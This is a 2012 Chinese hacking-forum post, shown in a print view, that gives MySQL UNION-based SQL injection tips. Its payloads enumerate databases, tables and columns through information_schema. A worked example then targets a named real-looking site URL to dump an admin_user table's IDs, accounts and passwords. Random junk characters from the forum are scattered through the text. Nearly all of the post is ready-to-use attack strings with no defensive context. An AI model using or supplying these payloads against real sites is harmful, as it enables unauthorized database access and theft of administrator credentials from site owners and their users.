中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]

作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库' L, U2 y; T# k3 [& {. I5 [0 {
2 c" n: d: @+ s# U6 O
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
5 x6 M" }4 U! \6 _% v
: f0 _- {  C: |: x查表' T8 q. h5 Q$ k* A5 @7 E! E

$ @- D& R+ j) bid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1" L8 ?& w6 u2 H) u( X

: A# r$ h# P, Q$ ~( q查段# W0 j' W7 y7 N- ?% m5 O* b
' ?* ^& v2 ~1 u6 W( H' f
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
; p7 h4 z( A! y. ]5 l
; _4 n3 I  E+ q, r/ _0 h: F& x6 d
mysql5高级注入方法暴表- \: u  q  S: a8 Q2 R2 w

+ A. ]  R% s+ |: x: E+ @例子如下:- k! N. S8 @, W

1 A0 X9 [3 x" Z0 s! o8 M0 H1.爆表
: F4 D4 N5 e4 C6 D& {: n$ j  q- Lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
( k3 w4 S  f1 s这样爆到第4个时出现了admin_user表。7 Y/ h; t" W, n
- e" b! U) Y. M
2.暴字段% I# r( I3 Q. Y5 {& r
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*, E& @: y/ L1 Y) h8 p7 [
* V7 G8 O1 y+ a9 e& S1 ]

# }- N3 w' [2 M- f3.爆密码7 b' \8 K; I6 D9 z' q& J- i% T
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* $ \  ^" x' c+ k* m, A7 n4 i

2 l7 A( o$ b$ `# J6 N/ f2 l3 b0 C6 v, M6 f1 D5 q





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2